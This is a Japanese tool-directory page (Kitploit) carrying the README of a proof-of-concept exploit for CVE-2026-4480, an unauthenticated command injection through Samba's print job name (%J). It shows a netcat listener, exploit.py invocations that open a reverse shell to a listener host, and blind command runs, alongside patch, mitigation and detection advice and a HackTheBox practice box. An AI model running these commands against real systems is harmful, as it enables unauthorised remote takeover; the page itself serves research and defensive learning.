Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-4480-PoC — CVE-2026-4480の概念実証エクスプロイト。Sambaの印刷サブシステムにおける%Jインジェクションを介した、認証不要のリモートコマンド実行です。リバースシェルとブラインドコマンド実行モードを含み、検出および緩和のガイダンスも提供します。 | Kitploit
ツール/GitHubGitHub/thecybergeek/cve-2026-4480-poc
エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育ラボと実践
GitHubthecybergeek/cve-2026-4480-poc

CVE-2026-4480-PoC

CVE-2026-4480の概念実証エクスプロイト。Sambaの印刷サブシステムにおける%Jインジェクションを介した、認証不要のリモートコマンド実行です。リバースシェルとブラインドコマンド実行モードを含み、検出および緩和のガイダンスも提供します。

リポジトリを見る
21543ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-4480:Samba print-command(%J)インジェクション PoC

重要 — 最初に必ずお読みください:
このリポジトリおよび exploit.py は教育および研究目的のみ提供されています。明示的な書面による許可がないシステム、ネットワーク、またはサービスに対してこのコードを使用しないでください。許可されていないコンピュータシステムへのアクセスは違法かつ非倫理的です。このコードを使用することにより、適用される法律および機関のポリシーに従うことに同意したものとみなします。

Samba の印刷サブシステムにおける未認証リモートコマンド実行。印刷ジョブのスプーリングが完了すると、Samba は設定された print command を system() を通じて実行し、%s(スプールファイルパス)と %J(クライアントが指定したジョブ名)を文字列内で置換します。修正前は、ジョブ名は ' → _ という単一の変換のみ行われ、それ以外の |、;、&、スペース、<、>、バッククォートはすべてシェルに到達します。したがって、%J を参照する print command はシェルインジェクションのシンクとなり、ゲストが印刷ジョブを送信できるため、この問題は事前認証です。

  • CVE: CVE-2026-4480
  • CVSS: 10.0
  • 修正バージョン: Samba 4.22.10、4.23.8、4.24.3
  • 影響を受ける構成: %J を参照する外部の print command を実行する印刷バックエンド(printing = sysv スタイル)。printing = cups / iprint は CUPS API 経由で処理されるため、影響を受けません。

必要条件

  • Samba Python バインディングがインストールされた Linux:
    root@kitploit:~
    sudo apt install python3-samba
    
  • ターゲットの SMB ポート(445/139)へのネットワークアクセス。
  • ターゲット上に print command が %J を参照するゲストアクセス可能なプリンター共有。

使用方法

root@kitploit:~
python3 exploit.py <rhost> <lhost> <lport> [-P PRINTER] [-c CMD]

リバースシェル

root@kitploit:~
# ターミナル1:リスナー
nc -lvnp 4444

# ターミナル2:エクスプロイトを発射
python3 exploit.py 10.129.244.177 10.10.14.100 4444

印刷サービスアカウント(例:nobody)としてシェルが得られるはずです。

単一コマンドの実行(ブラインド)

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'

実行はブラインド(コマンドはサーバー側で実行され、RPC チャネルには何も返らない)であるため、最初に帯域外で確認します。例:tcpdump -ni tun0 icmp で監視する ICMP コールバックを使用します。

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'

検出 / 緩和策

  • 4.22.10 / 4.23.8 / 4.24.3(またはそれ以降)にパッチを適用する。
  • パッチを適用できない場合は、マクロを引用符で囲む:print command = /usr/local/bin/print-helper %s '%J'、%J を削除する、または printing = cups に移行する。
  • smbd によるシェル(sh/bash/nc/python/curl)の生成を監視し、シェルのメタ文字を含むドキュメント名を検索する。

HackTheBox で練習する

HackTheBox 上に Abducted というボックスを作成しました。この脆弱性を紹介し、攻撃者が誤設定された環境でどのように悪用できるかを実際に体験できます。

ツールをダウンロード
引数 / オプション説明
rhostターゲット Samba ホスト / IP
lhostリスナー IP
lportリスナーポート
-P, --printerゲストプリンター共有名(デフォルト:HP-Reception)
-c, --cmdリバースシェルではなく任意のコマンドを実行